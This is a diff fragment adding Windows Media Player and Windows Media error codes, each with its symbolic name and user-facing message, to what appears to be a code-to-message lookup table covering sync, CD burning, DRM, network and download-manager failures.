+ 0xC00D1192: ("NS_E_PDA_ENCODER_NOT_RESPONDING", "Windows Media Player cannot sync the file because an error occurred while converting the file to another quality level or format. If the problem persists, remove the file from the list of files to sync."),
+ 0xC00D1193: ("NS_E_PDA_CANNOT_SYNC_FROM_LOCATION", "Windows Media Player cannot sync the file to your device. The file might be stored in a location that is not supported. Copy the file from its current location to your hard disk, add it to your library, and then try to sync the file again."),
+ 0xC00D1194: ("NS_E_WMP_PROTOCOL_PROBLEM", "Windows Media Player cannot open the specified URL. Verify that the Player is configured to use all available protocols, and then try again."),
+ 0xC00D1195: ("NS_E_WMP_NO_DISK_SPACE", "Windows Media Player cannot perform the requested action because there is not enough storage space on your computer. Delete some unneeded files on your hard disk, and then try again."),
+ 0xC00D1196: ("NS_E_WMP_LOGON_FAILURE", "The server denied access to the file. Verify that you are using the correct user name and password."),
+ 0xC00D1197: ("NS_E_WMP_CANNOT_FIND_FILE", "Windows Media Player cannot find the file. If you are trying to play, burn, or sync an item that is in your library, the item might point to a file that has been moved, renamed, or deleted."),
+ 0xC00D1198: ("NS_E_WMP_SERVER_INACCESSIBLE", "Windows Media Player cannot connect to the server. The server name might not be correct, the server might not be available, or your proxy settings might not be correct."),
+ 0xC00D1199: ("NS_E_WMP_UNSUPPORTED_FORMAT", "Windows Media Player cannot play the file. The Player might not support the file type or might not support the codec that was used to compress the file."),
+ 0xC00D119A: ("NS_E_WMP_DSHOW_UNSUPPORTED_FORMAT", "Windows Media Player cannot play the file. The Player might not support the file type or a required codec might not be installed on your computer."),
+ 0xC00D119B: ("NS_E_WMP_PLAYLIST_EXISTS", "Windows Media Player cannot create the playlist because the name already exists. Type a different playlist name."),
+ 0xC00D119C: ("NS_E_WMP_NONMEDIA_FILES", "Windows Media Player cannot delete the playlist because it contains items that are not digital media files. Any digital media files in the playlist were deleted."),
+ 0xC00D119D: ("NS_E_WMP_INVALID_ASX", "The playlist cannot be opened because it is stored in a shared folder on another computer. If possible, move the playlist to the playlists folder on your computer."),
+ 0xC00D119E: ("NS_E_WMP_ALREADY_IN_USE", "Windows Media Player is already in use. Stop playing any items, close all Player dialog boxes, and then try again."),
+ 0xC00D119F: ("NS_E_WMP_IMAPI_FAILURE", "Windows Media Player encountered an error while burning. Verify that the burner is connected properly and that the disc is clean and not damaged."),
+ 0xC00D11A0: ("NS_E_WMP_WMDM_FAILURE", "Windows Media Player has encountered an unknown error with your portable device. Reconnect your portable device, and then try again."),
+ 0xC00D11A1: ("NS_E_WMP_CODEC_NEEDED_WITH_4CC", "A codec is required to play this file. To determine if this codec is available to download from the web, click Web Help."),
+ 0xC00D11A2: ("NS_E_WMP_CODEC_NEEDED_WITH_FORMATTAG", "An audio codec is needed to play this file. To determine if this codec is available to download from the web, click Web Help."),
+ 0xC00D11A3: ("NS_E_WMP_MSSAP_NOT_AVAILABLE", "To play the file, you must install the latest Windows service pack. To install the service pack from the Windows Update website, click Web Help."),
+ 0xC00D11A4: ("NS_E_WMP_WMDM_INTERFACEDEAD", "Windows Media Player no longer detects a portable device. Reconnect your portable device, and then try again."),
+ 0xC00D11A5: ("NS_E_WMP_WMDM_NOTCERTIFIED", "Windows Media Player cannot sync the file because the portable device does not support protected files."),
+ 0xC00D11A6: ("NS_E_WMP_WMDM_LICENSE_NOTEXIST", "This file does not have sync rights. If you obtained this file from an online store, go to the online store to get sync rights."),
+ 0xC00D11A7: ("NS_E_WMP_WMDM_LICENSE_EXPIRED", "Windows Media Player cannot sync the file because the sync rights have expired. Go to the content provider's online store to get new sync rights."),
+ 0xC00D11A8: ("NS_E_WMP_WMDM_BUSY", "The portable device is already in use. Wait until the current task finishes or quit other programs that might be using the portable device, and then try again."),
+ 0xC00D11A9: ("NS_E_WMP_WMDM_NORIGHTS", "Windows Media Player cannot sync the file because the content provider or device prohibits it. You might be able to resolve this problem by going to the content provider's online store to get sync rights."),
+ 0xC00D11AA: ("NS_E_WMP_WMDM_INCORRECT_RIGHTS", "The content provider has not granted you the right to sync this file. Go to the content provider's online store to get sync rights."),
+ 0xC00D11AB: ("NS_E_WMP_IMAPI_GENERIC", "Windows Media Player cannot burn the files to the CD. Verify that the disc is clean and not damaged. If necessary, select a slower recording speed or try a different brand of blank discs."),
+ 0xC00D11AD: ("NS_E_WMP_IMAPI_DEVICE_NOTPRESENT", "Windows Media Player cannot burn the files. Verify that the burner is connected properly, and then try again."),
+ 0xC00D11AE: ("NS_E_WMP_IMAPI_DEVICE_BUSY", "Windows Media Player cannot burn the files. Verify that the burner is connected properly and that the disc is clean and not damaged. If the burner is already in use, wait until the current task finishes or quit other programs that might be using the burner."),
+ 0xC00D11AF: ("NS_E_WMP_IMAPI_LOSS_OF_STREAMING", "Windows Media Player cannot burn the files to the CD."),
+ 0xC00D11B0: ("NS_E_WMP_SERVER_UNAVAILABLE", "Windows Media Player cannot play the file. The server might not be available or there might be a problem with your network or firewall settings."),
+ 0xC00D11B1: ("NS_E_WMP_FILE_OPEN_FAILED", "Windows Media Player encountered a problem while playing the file. For additional assistance, click Web Help."),
+ 0xC00D11B2: ("NS_E_WMP_VERIFY_ONLINE", "Windows Media Player must connect to the Internet to verify the file's media usage rights. Connect to the Internet, and then try again."),
+ 0xC00D11B3: ("NS_E_WMP_SERVER_NOT_RESPONDING", "Windows Media Player cannot play the file because a network error occurred. The server might not be available. Verify that you are connected to the network and that your proxy settings are correct."),
+ 0xC00D11B4: ("NS_E_WMP_DRM_CORRUPT_BACKUP", "Windows Media Player cannot restore your media usage rights because it could not find any backed up rights on your computer."),
+ 0xC00D11B5: ("NS_E_WMP_DRM_LICENSE_SERVER_UNAVAILABLE", "Windows Media Player cannot download media usage rights because the server is not available (for example, the server might be busy or not online)."),
+ 0xC00D11B6: ("NS_E_WMP_NETWORK_FIREWALL", "Windows Media Player cannot play the file. A network firewall might be preventing the Player from opening the file by using the UDP transport protocol. If you typed a URL in the Open URL dialog box, try using a different transport protocol (for example, \"http:\")."),
+ 0xC00D11B7: ("NS_E_WMP_NO_REMOVABLE_MEDIA", "Insert the removable media, and then try again."),
+ 0xC00D11B8: ("NS_E_WMP_PROXY_CONNECT_TIMEOUT", "Windows Media Player cannot play the file because the proxy server is not responding. The proxy server might be temporarily unavailable or your Player proxy settings might not be valid."),
+ 0xC00D11B9: ("NS_E_WMP_NEED_UPGRADE", "To play the file, you might need to install a later version of Windows Media Player. On the Help menu, click Check for Updates, and then follow the instructions. For additional assistance, click Web Help."),
+ 0xC00D11BA: ("NS_E_WMP_AUDIO_HW_PROBLEM", "Windows Media Player cannot play the file because there is a problem with your sound device. There might not be a sound device installed on your computer, it might be in use by another program, or it might not be functioning properly."),
+ 0xC00D11BB: ("NS_E_WMP_INVALID_PROTOCOL", "Windows Media Player cannot play the file because the specified protocol is not supported. If you typed a URL in the Open URL dialog box, try using a different transport protocol (for example, \"http:\" or \"rtsp:\")."),
+ 0xC00D11BC: ("NS_E_WMP_INVALID_LIBRARY_ADD", "Windows Media Player cannot add the file to the library because the file format is not supported."),
+ 0xC00D11BD: ("NS_E_WMP_MMS_NOT_SUPPORTED", "Windows Media Player cannot play the file because the specified protocol is not supported. If you typed a URL in the Open URL dialog box, try using a different transport protocol (for example, \"mms:\")."),
+ 0xC00D11BE: ("NS_E_WMP_NO_PROTOCOLS_SELECTED", "Windows Media Player cannot play the file because there are no streaming protocols selected. Select one or more protocols, and then try again."),
+ 0xC00D11BF: ("NS_E_WMP_GOFULLSCREEN_FAILED", "Windows Media Player cannot switch to Full Screen. You might need to adjust your Windows display settings. Open display settings in Control Panel, and then try setting Hardware acceleration to Full."),
+ 0xC00D11C0: ("NS_E_WMP_NETWORK_ERROR", "Windows Media Player cannot play the file because a network error occurred. The server might not be available (for example, the server is busy or not online) or you might not be connected to the network."),
+ 0xC00D11C1: ("NS_E_WMP_CONNECT_TIMEOUT", "Windows Media Player cannot play the file because the server is not responding. Verify that you are connected to the network, and then try again later."),
+ 0xC00D11C2: ("NS_E_WMP_MULTICAST_DISABLED", "Windows Media Player cannot play the file because the multicast protocol is not enabled. On the Tools menu, click Options, click the Network tab, and then select the Multicast check box. For additional assistance, click Web Help."),
+ 0xC00D11C3: ("NS_E_WMP_SERVER_DNS_TIMEOUT", "Windows Media Player cannot play the file because a network problem occurred. Verify that you are connected to the network, and then try again later."),
+ 0xC00D11C4: ("NS_E_WMP_PROXY_NOT_FOUND", "Windows Media Player cannot play the file because the network proxy server cannot be found. Verify that your proxy settings are correct, and then try again."),
+ 0xC00D11C5: ("NS_E_WMP_TAMPERED_CONTENT", "Windows Media Player cannot play the file because it is corrupted."),
+ 0xC00D11C6: ("NS_E_WMP_OUTOFMEMORY", "Your computer is running low on memory. Quit other programs, and then try again."),
+ 0xC00D11C7: ("NS_E_WMP_AUDIO_CODEC_NOT_INSTALLED", "Windows Media Player cannot play, burn, rip, or sync the file because a required audio codec is not installed on your computer."),
+ 0xC00D11C8: ("NS_E_WMP_VIDEO_CODEC_NOT_INSTALLED", "Windows Media Player cannot play the file because the required video codec is not installed on your computer."),
+ 0xC00D11C9: ("NS_E_WMP_IMAPI_DEVICE_INVALIDTYPE", "Windows Media Player cannot burn the files. If the burner is busy, wait for the current task to finish. If necessary, verify that the burner is connected properly and that you have installed the latest device driver."),
+ 0xC00D11CA: ("NS_E_WMP_DRM_DRIVER_AUTH_FAILURE", "Windows Media Player cannot play the protected file because there is a problem with your sound device. Try installing a new device driver or use a different sound device."),
+ 0xC00D11CB: ("NS_E_WMP_NETWORK_RESOURCE_FAILURE", "Windows Media Player encountered a network error. Restart the Player."),
+ 0xC00D11CC: ("NS_E_WMP_UPGRADE_APPLICATION", "Windows Media Player is not installed properly. Reinstall the Player."),
+ 0xC00D11CD: ("NS_E_WMP_UNKNOWN_ERROR", "Windows Media Player encountered an unknown error. For additional assistance, click Web Help."),
+ 0xC00D11CE: ("NS_E_WMP_INVALID_KEY", "Windows Media Player cannot play the file because the required codec is not valid."),
+ 0xC00D11CF: ("NS_E_WMP_CD_ANOTHER_USER", "The CD drive is in use by another user. Wait for the task to complete, and then try again."),
+ 0xC00D11D0: ("NS_E_WMP_DRM_NEEDS_AUTHORIZATION", "Windows Media Player cannot play, sync, or burn the protected file because a problem occurred with the Windows Media Digital Rights Management (DRM) system. You might need to connect to the Internet to update your DRM components. For additional assistance, click Web Help."),
+ 0xC00D11D1: ("NS_E_WMP_BAD_DRIVER", "Windows Media Player cannot play the file because there might be a problem with your sound or video device. Try installing an updated device driver."),
+ 0xC00D11D2: ("NS_E_WMP_ACCESS_DENIED", "Windows Media Player cannot access the file. The file might be in use, you might not have access to the computer where the file is stored, or your proxy settings might not be correct."),
+ 0xC00D11D3: ("NS_E_WMP_LICENSE_RESTRICTS", "The content provider prohibits this action. Go to the content provider's online store to get new media usage rights."),
+ 0xC00D11D4: ("NS_E_WMP_INVALID_REQUEST", "Windows Media Player cannot perform the requested action at this time."),
+ 0xC00D11D5: ("NS_E_WMP_CD_STASH_NO_SPACE", "Windows Media Player cannot burn the files because there is not enough free disk space to store the temporary files. Delete some unneeded files on your hard disk, and then try again."),
+ 0xC00D11D6: ("NS_E_WMP_DRM_NEW_HARDWARE", "Your media usage rights have become corrupted or are no longer valid. This might happen if you have replaced hardware components in your computer."),
+ 0xC00D11D7: ("NS_E_WMP_DRM_INVALID_SIG", "The required Windows Media Digital Rights Management (DRM) component cannot be validated. You might be able resolve the problem by reinstalling the Player."),
+ 0xC00D11D8: ("NS_E_WMP_DRM_CANNOT_RESTORE", "You have exceeded your restore limit for the day. Try restoring your media usage rights tomorrow."),
+ 0xC00D11D9: ("NS_E_WMP_BURN_DISC_OVERFLOW", "Some files might not fit on the CD. The required space cannot be calculated accurately because some files might be missing duration information. To ensure the calculation is accurate, play the files that are missing duration information."),
+ 0xC00D11DA: ("NS_E_WMP_DRM_GENERIC_LICENSE_FAILURE", "Windows Media Player cannot verify the file's media usage rights. If you obtained this file from an online store, go to the online store to get the necessary rights."),
+ 0xC00D11DB: ("NS_E_WMP_DRM_NO_SECURE_CLOCK", "It is not possible to sync because this device's internal clock is not set correctly. To set the clock, select the option to set the device clock on the Privacy tab of the Options dialog box, connect to the Internet, and then sync the device again. For additional assistance, click Web Help."),
+ 0xC00D11DC: ("NS_E_WMP_DRM_NO_RIGHTS", "Windows Media Player cannot play, burn, rip, or sync the protected file because you do not have the appropriate rights."),
+ 0xC00D11DD: ("NS_E_WMP_DRM_INDIV_FAILED", "Windows Media Player encountered an error during upgrade."),
+ 0xC00D11DE: ("NS_E_WMP_SERVER_NONEWCONNECTIONS", "Windows Media Player cannot connect to the server because it is not accepting any new connections. This could be because it has reached its maximum connection limit. Please try again later."),
+ 0xC00D11DF: ("NS_E_WMP_MULTIPLE_ERROR_IN_PLAYLIST", "A number of queued files cannot be played. To find information about the problem, click the Now Playing tab, and then click the icon next to each file in the List pane."),
+ 0xC00D11E0: ("NS_E_WMP_IMAPI2_ERASE_FAIL", "Windows Media Player encountered an error while erasing the rewritable CD or DVD. Verify that the CD or DVD burner is connected properly and that the disc is clean and not damaged."),
+ 0xC00D11E1: ("NS_E_WMP_IMAPI2_ERASE_DEVICE_BUSY", "Windows Media Player cannot erase the rewritable CD or DVD. Verify that the CD or DVD burner is connected properly and that the disc is clean and not damaged. If the burner is already in use, wait until the current task finishes or quit other programs that might be using the burner."),
+ 0xC00D11E2: ("NS_E_WMP_DRM_COMPONENT_FAILURE", "A Windows Media Digital Rights Management (DRM) component encountered a problem. If you are trying to use a file that you obtained from an online store, try going to the online store and getting the appropriate usage rights."),
+ 0xC00D11E3: ("NS_E_WMP_DRM_NO_DEVICE_CERT", "It is not possible to obtain device's certificate. Please contact the device manufacturer for a firmware update or for other steps to resolve this problem."),
+ 0xC00D11E4: ("NS_E_WMP_SERVER_SECURITY_ERROR", "Windows Media Player encountered an error when connecting to the server. The security information from the server could not be validated."),
+ 0xC00D11E5: ("NS_E_WMP_AUDIO_DEVICE_LOST", "An audio device was disconnected or reconfigured. Verify that the audio device is connected, and then try to play the item again."),
+ 0xC00D11E6: ("NS_E_WMP_IMAPI_MEDIA_INCOMPATIBLE", "Windows Media Player could not complete burning because the disc is not compatible with your drive. Try inserting a different kind of recordable media or use a disc that supports a write speed that is compatible with your drive."),
+ 0xC00D11EE: ("NS_E_SYNCWIZ_DEVICE_FULL", "Windows Media Player cannot save the sync settings because your device is full. Delete some unneeded files on your device and then try again."),
+ 0xC00D11EF: ("NS_E_SYNCWIZ_CANNOT_CHANGE_SETTINGS", "It is not possible to change sync settings at this time. Try again later."),
+ 0xC00D11F0: ("NS_E_TRANSCODE_DELETECACHEERROR", "Windows Media Player cannot delete these files currently. If the Player is synchronizing, wait until it is complete and then try again."),
+ 0xC00D11F8: ("NS_E_CD_NO_BUFFERS_READ", "Windows Media Player could not use digital mode to read the CD. The Player has automatically switched the CD drive to analog mode. To switch back to digital mode, use the Devices tab. For additional assistance, click Web Help."),
+ 0xC00D11F9: ("NS_E_CD_EMPTY_TRACK_QUEUE", "No CD track was specified for playback."),
+ 0xC00D11FA: ("NS_E_CD_NO_READER", "The CD filter was not able to create the CD reader."),
+ 0xC00D11FB: ("NS_E_CD_ISRC_INVALID", "Invalid ISRC code."),
+ 0xC00D11FC: ("NS_E_CD_MEDIA_CATALOG_NUMBER_INVALID", "Invalid Media Catalog Number."),
+ 0xC00D11FD: ("NS_E_SLOW_READ_DIGITAL_WITH_ERRORCORRECTION", "Windows Media Player cannot play audio CDs correctly because the CD drive is slow and error correction is turned on. To increase performance, turn off playback error correction for this drive."),
+ 0xC00D11FE: ("NS_E_CD_SPEEDDETECT_NOT_ENOUGH_READS", "Windows Media Player cannot estimate the CD drive's playback speed because the CD track is too short."),
+ 0xC00D11FF: ("NS_E_CD_QUEUEING_DISABLED", "Cannot queue the CD track because queuing is not enabled."),
+ 0xC00D1202: ("NS_E_WMP_DRM_ACQUIRING_LICENSE", "Windows Media Player cannot download additional media usage rights until the current download is complete."),
+ 0xC00D1203: ("NS_E_WMP_DRM_LICENSE_EXPIRED", "The media usage rights for this file have expired or are no longer valid. If you obtained the file from an online store, sign in to the store, and then try again."),
+ 0xC00D1204: ("NS_E_WMP_DRM_LICENSE_NOTACQUIRED", "Windows Media Player cannot download the media usage rights for the file. If you obtained the file from an online store, sign in to the store, and then try again."),
+ 0xC00D1205: ("NS_E_WMP_DRM_LICENSE_NOTENABLED", "The media usage rights for this file are not yet valid. To see when they will become valid, right-click the file in the library, click Properties, and then click the Media Usage Rights tab."),
+ 0xC00D1206: ("NS_E_WMP_DRM_LICENSE_UNUSABLE", "The media usage rights for this file are not valid. If you obtained this file from an online store, contact the store for assistance."),
+ 0xC00D1207: ("NS_E_WMP_DRM_LICENSE_CONTENT_REVOKED", "The content provider has revoked the media usage rights for this file. If you obtained this file from an online store, ask the store if a new version of the file is available."),
+ 0xC00D1208: ("NS_E_WMP_DRM_LICENSE_NOSAP", "The media usage rights for this file require a feature that is not supported in your current version of Windows Media Player or your current version of Windows. Try installing the latest version of the Player. If you obtained this file from an online store, contact the store for further assistance."),
+ 0xC00D1209: ("NS_E_WMP_DRM_UNABLE_TO_ACQUIRE_LICENSE", "Windows Media Player cannot download media usage rights at this time. Try again later."),
+ 0xC00D120A: ("NS_E_WMP_LICENSE_REQUIRED", "Windows Media Player cannot play, burn, or sync the file because the media usage rights are missing. If you obtained the file from an online store, sign in to the store, and then try again."),
+ 0xC00D120B: ("NS_E_WMP_PROTECTED_CONTENT", "Windows Media Player cannot play, burn, or sync the file because the media usage rights are missing. If you obtained the file from an online store, sign in to the store, and then try again."),
+ 0xC00D122A: ("NS_E_WMP_POLICY_VALUE_NOT_CONFIGURED", "Windows Media Player cannot read a policy. This can occur when the policy does not exist in the registry or when the registry cannot be read."),
+ 0xC00D1234: ("NS_E_PDA_CANNOT_SYNC_FROM_INTERNET", "Windows Media Player cannot sync content streamed directly from the Internet. If possible, download the file to your computer, and then try to sync the file."),
+ 0xC00D1235: ("NS_E_PDA_CANNOT_SYNC_INVALID_PLAYLIST", "This playlist is not valid or is corrupted. Create a new playlist using Windows Media Player, then sync the new playlist instead."),
+ 0xC00D1236: ("NS_E_PDA_FAILED_TO_SYNCHRONIZE_FILE", "Windows Media Player encountered a problem while synchronizing the file to the device. For additional assistance, click Web Help."),
+ 0xC00D1237: ("NS_E_PDA_SYNC_FAILED", "Windows Media Player encountered an error while synchronizing to the device."),
+ 0xC00D1238: ("NS_E_PDA_DELETE_FAILED", "Windows Media Player cannot delete a file from the device."),
+ 0xC00D1239: ("NS_E_PDA_FAILED_TO_RETRIEVE_FILE", "Windows Media Player cannot copy a file from the device to your library."),
+ 0xC00D123A: ("NS_E_PDA_DEVICE_NOT_RESPONDING", "Windows Media Player cannot communicate with the device because the device is not responding. Try reconnecting the device, resetting the device, or contacting the device manufacturer for updated firmware."),
+ 0xC00D123B: ("NS_E_PDA_FAILED_TO_TRANSCODE_PHOTO", "Windows Media Player cannot sync the picture to the device because a problem occurred while converting the file to another quality level or format. The original file might be damaged or corrupted."),
+ 0xC00D123C: ("NS_E_PDA_FAILED_TO_ENCRYPT_TRANSCODED_FILE", "Windows Media Player cannot convert the file. The file might have been encrypted by the Encrypted File System (EFS). Try decrypting the file first and then synchronizing it. For information about how to decrypt a file, see Windows Help and Support."),
+ 0xC00D123D: ("NS_E_PDA_CANNOT_TRANSCODE_TO_AUDIO", "Your device requires that this file be converted in order to play on the device. However, the device either does not support playing audio, or Windows Media Player cannot convert the file to an audio format that is supported by the device."),
+ 0xC00D123E: ("NS_E_PDA_CANNOT_TRANSCODE_TO_VIDEO", "Your device requires that this file be converted in order to play on the device. However, the device either does not support playing video, or Windows Media Player cannot convert the file to a video format that is supported by the device."),
+ 0xC00D123F: ("NS_E_PDA_CANNOT_TRANSCODE_TO_IMAGE", "Your device requires that this file be converted in order to play on the device. However, the device either does not support displaying pictures, or Windows Media Player cannot convert the file to a picture format that is supported by the device."),
+ 0xC00D1240: ("NS_E_PDA_RETRIEVED_FILE_FILENAME_TOO_LONG", "Windows Media Player cannot sync the file to your computer because the file name is too long. Try renaming the file on the device."),
+ 0xC00D1241: ("NS_E_PDA_CEWMDM_DRM_ERROR", "Windows Media Player cannot sync the file because the device is not responding. This typically occurs when there is a problem with the device firmware. For additional assistance, click Web Help."),
+ 0xC00D1242: ("NS_E_INCOMPLETE_PLAYLIST", "Incomplete playlist."),
+ 0xC00D1243: ("NS_E_PDA_SYNC_RUNNING", "It is not possible to perform the requested action because sync is in progress. You can either stop sync or wait for it to complete, and then try again."),
+ 0xC00D1244: ("NS_E_PDA_SYNC_LOGIN_ERROR", "Windows Media Player cannot sync the subscription content because you are not signed in to the online store that provided it. Sign in to the online store, and then try again."),
+ 0xC00D1245: ("NS_E_PDA_TRANSCODE_CODEC_NOT_FOUND", "Windows Media Player cannot convert the file to the format required by the device. One or more codecs required to convert the file could not be found."),
+ 0xC00D1246: ("NS_E_CANNOT_SYNC_DRM_TO_NON_JANUS_DEVICE", "It is not possible to sync subscription files to this device."),
+ 0xC00D1247: ("NS_E_CANNOT_SYNC_PREVIOUS_SYNC_RUNNING", "Your device is operating slowly or is not responding. Until the device responds, it is not possible to sync again. To return the device to normal operation, try disconnecting it from the computer or resetting it."),
+ 0xC00D125C: ("NS_E_WMP_HWND_NOTFOUND", "The Windows Media Player download manager cannot function properly because the Player main window cannot be found. Try restarting the Player."),
+ 0xC00D125D: ("NS_E_BKGDOWNLOAD_WRONG_NO_FILES", "Windows Media Player encountered a download that has the wrong number of files. This might occur if another program is trying to create jobs with the same signature as the Player."),
+ 0xC00D125E: ("NS_E_BKGDOWNLOAD_COMPLETECANCELLEDJOB", "Windows Media Player tried to complete a download that was already canceled. The file will not be available."),
+ 0xC00D125F: ("NS_E_BKGDOWNLOAD_CANCELCOMPLETEDJOB", "Windows Media Player tried to cancel a download that was already completed. The file will not be removed."),
+ 0xC00D1260: ("NS_E_BKGDOWNLOAD_NOJOBPOINTER", "Windows Media Player is trying to access a download that is not valid."),
+ 0xC00D1261: ("NS_E_BKGDOWNLOAD_INVALIDJOBSIGNATURE", "This download was not created by Windows Media Player."),
+ 0xC00D1262: ("NS_E_BKGDOWNLOAD_FAILED_TO_CREATE_TEMPFILE", "The Windows Media Player download manager cannot create a temporary file name. This might occur if the path is not valid or if the disk is full."),
+ 0xC00D1263: ("NS_E_BKGDOWNLOAD_PLUGIN_FAILEDINITIALIZE", "The Windows Media Player download manager plug-in cannot start. This might occur if the system is out of resources."),
+ 0xC00D1264: ("NS_E_BKGDOWNLOAD_PLUGIN_FAILEDTOMOVEFILE", "The Windows Media Player download manager cannot move the file."),
+ 0xC00D1265: ("NS_E_BKGDOWNLOAD_CALLFUNCFAILED", "The Windows Media Player download manager cannot perform a task because the system has no resources to allocate."),
+ 0xC00D1266: ("NS_E_BKGDOWNLOAD_CALLFUNCTIMEOUT", "The Windows Media Player download manager cannot perform a task because the task took too long to run."),
+ 0xC00D1267: ("NS_E_BKGDOWNLOAD_CALLFUNCENDED", "The Windows Media Player download manager cannot perform a task because the Player is terminating the service. The task will be recovered when the Player restarts."),
+ 0xC00D1268: ("NS_E_BKGDOWNLOAD_WMDUNPACKFAILED", "The Windows Media Player download manager cannot expand a WMD file. The file will be deleted and the operation will not be completed successfully."),
+ 0xC00D1269: ("NS_E_BKGDOWNLOAD_FAILEDINITIALIZE", "The Windows Media Player download manager cannot start. This might occur if the system is out of resources."),
+ 0xC00D126A: ("NS_E_INTERFACE_NOT_REGISTERED_IN_GIT", "Windows Media Player cannot access a required functionality. This might occur if the wrong system files or Player DLLs are loaded."),
+ 0xC00D126B: ("NS_E_BKGDOWNLOAD_INVALID_FILE_NAME", "Windows Media Player cannot get the file name of the requested download. The requested download will be canceled."),
+ 0xC00D128E: ("NS_E_IMAGE_DOWNLOAD_FAILED", "Windows Media Player encountered an error while downloading an image."),
+ 0xC00D12C0: ("NS_E_WMP_UDRM_NOUSERLIST", "Windows Media Player cannot update your media usage rights because the Player cannot verify the list of activated users of this computer."),
+ 0xC00D12C1: ("NS_E_WMP_DRM_NOT_ACQUIRING", "Windows Media Player is trying to acquire media usage rights for a file that is no longer being used. Rights acquisition will stop."),
+ 0xC00D12F2: ("NS_E_WMP_BSTR_TOO_LONG", "The parameter is not valid."),
+ 0xC00D12FC: ("NS_E_WMP_AUTOPLAY_INVALID_STATE", "The state is not valid for this request."),
+ 0xC00D1306: ("NS_E_WMP_COMPONENT_REVOKED", "Windows Media Player cannot play this file until you complete the software component upgrade. After the component has been upgraded, try to play the file again."),
+ 0xC00D1324: ("NS_E_CURL_NOTSAFE", "The URL is not safe for the operation specified."),
+ 0xC00D1325: ("NS_E_CURL_INVALIDCHAR", "The URL contains one or more characters that are not valid."),
+ 0xC00D1326: ("NS_E_CURL_INVALIDHOSTNAME", "The URL contains a host name that is not valid."),
+ 0xC00D1327: ("NS_E_CURL_INVALIDPATH", "The URL contains a path that is not valid."),
+ 0xC00D1328: ("NS_E_CURL_INVALIDSCHEME", "The URL contains a scheme that is not valid."),
+ 0xC00D1329: ("NS_E_CURL_INVALIDURL", "The URL is not valid."),
+ 0xC00D132B: ("NS_E_CURL_CANTWALK", "Windows Media Player cannot play the file. If you clicked a link on a web page, the link might not be valid."),
+ 0xC00D132C: ("NS_E_CURL_INVALIDPORT", "The URL port is not valid."),
+ 0xC00D132D: ("NS_E_CURLHELPER_NOTADIRECTORY", "The URL is not a directory."),
+ 0xC00D132E: ("NS_E_CURLHELPER_NOTAFILE", "The URL is not a file."),
+ 0xC00D132F: ("NS_E_CURL_CANTDECODE", "The URL contains characters that cannot be decoded. The URL might be truncated or incomplete."),
+ 0xC00D1330: ("NS_E_CURLHELPER_NOTRELATIVE", "The specified URL is not a relative URL."),
+ 0xC00D1331: ("NS_E_CURL_INVALIDBUFFERSIZE", "The buffer is smaller than the size specified."),
+ 0xC00D1356: ("NS_E_SUBSCRIPTIONSERVICE_PLAYBACK_DISALLOWED", "The content provider has not granted you the right to play this file. Go to the content provider's online store to get play rights."),
+ 0xC00D1357: ("NS_E_CANNOT_BUY_OR_DOWNLOAD_FROM_MULTIPLE_SERVICES", "Windows Media Player cannot purchase or download content from multiple online stores."),
+ 0xC00D1358: ("NS_E_CANNOT_BUY_OR_DOWNLOAD_CONTENT", "The file cannot be purchased or downloaded. The file might not be available from the online store."),
+ 0xC00D135A: ("NS_E_NOT_CONTENT_PARTNER_TRACK", "The provider of this file cannot be identified."),
+ 0xC00D135B: ("NS_E_TRACK_DOWNLOAD_REQUIRES_ALBUM_PURCHASE", "The file is only available for download when you buy the entire album."),
+ 0xC00D135C: ("NS_E_TRACK_DOWNLOAD_REQUIRES_PURCHASE", "You must buy the file before you can download it."),
+ 0xC00D135D: ("NS_E_TRACK_PURCHASE_MAXIMUM_EXCEEDED", "You have exceeded the maximum number of files that can be purchased in a single transaction."),
+ 0xC00D135F: ("NS_E_SUBSCRIPTIONSERVICE_LOGIN_FAILED", "Windows Media Player cannot sign in to the online store. Verify that you are using the correct user name and password. If the problem persists, the store may be temporarily unavailable."),
+ 0xC00D1360: ("NS_E_SUBSCRIPTIONSERVICE_DOWNLOAD_TIMEOUT", "Windows Media Player cannot download this item because the server is not responding. The server might be temporarily unavailable or you may have lost your Internet connection."),
+ 0xC00D1362: ("NS_E_CONTENT_PARTNER_STILL_INITIALIZING", "Content Partner still initializing."),
+ 0xC00D1363: ("NS_E_OPEN_CONTAINING_FOLDER_FAILED", "The folder could not be opened. The folder may have been moved or deleted."),
+ 0xC00D136A: ("NS_E_ADVANCEDEDIT_TOO_MANY_PICTURES", "Windows Media Player could not add all of the images to the file because the images exceeded the 7 megabyte (MB) limit."),
+ 0xC00D1388: ("NS_E_REDIRECT", "The client redirected to another server."),
+ 0xC00D1389: ("NS_E_STALE_PRESENTATION", "The streaming media description is no longer current."),
+ 0xC00D138A: ("NS_E_NAMESPACE_WRONG_PERSIST", "It is not possible to create a persistent namespace node under a transient parent node."),
+ 0xC00D138B: ("NS_E_NAMESPACE_WRONG_TYPE", "It is not possible to store a value in a namespace node that has a different value type."),
+ 0xC00D138C: ("NS_E_NAMESPACE_NODE_CONFLICT", "It is not possible to remove the root namespace node."),
+ 0xC00D138D: ("NS_E_NAMESPACE_NODE_NOT_FOUND", "The specified namespace node could not be found."),
+ 0xC00D138E: ("NS_E_NAMESPACE_BUFFER_TOO_SMALL", "The buffer supplied to hold namespace node string is too small."),
+ 0xC00D138F: ("NS_E_NAMESPACE_TOO_MANY_CALLBACKS", "The callback list on a namespace node is at the maximum size."),
+ 0xC00D1390: ("NS_E_NAMESPACE_DUPLICATE_CALLBACK", "It is not possible to register an already-registered callback on a namespace node."),
+ 0xC00D1391: ("NS_E_NAMESPACE_CALLBACK_NOT_FOUND", "Cannot find the callback in the namespace when attempting to remove the callback."),
+ 0xC00D1392: ("NS_E_NAMESPACE_NAME_TOO_LONG", "The namespace node name exceeds the allowed maximum length."),
+ 0xC00D1393: ("NS_E_NAMESPACE_DUPLICATE_NAME", "Cannot create a namespace node that already exists."),
+ 0xC00D1394: ("NS_E_NAMESPACE_EMPTY_NAME", "The namespace node name cannot be a null string."),
+ 0xC00D1395: ("NS_E_NAMESPACE_INDEX_TOO_LARGE", "Finding a child namespace node by index failed because the index exceeded the number of children."),
+ 0xC00D1396: ("NS_E_NAMESPACE_BAD_NAME", "The namespace node name is invalid."),
+ 0xC00D1397: ("NS_E_NAMESPACE_WRONG_SECURITY", "It is not possible to store a value in a namespace node that has a different security type."),
+ 0xC00D13EC: ("NS_E_CACHE_ARCHIVE_CONFLICT", "The archive request conflicts with other requests in progress."),
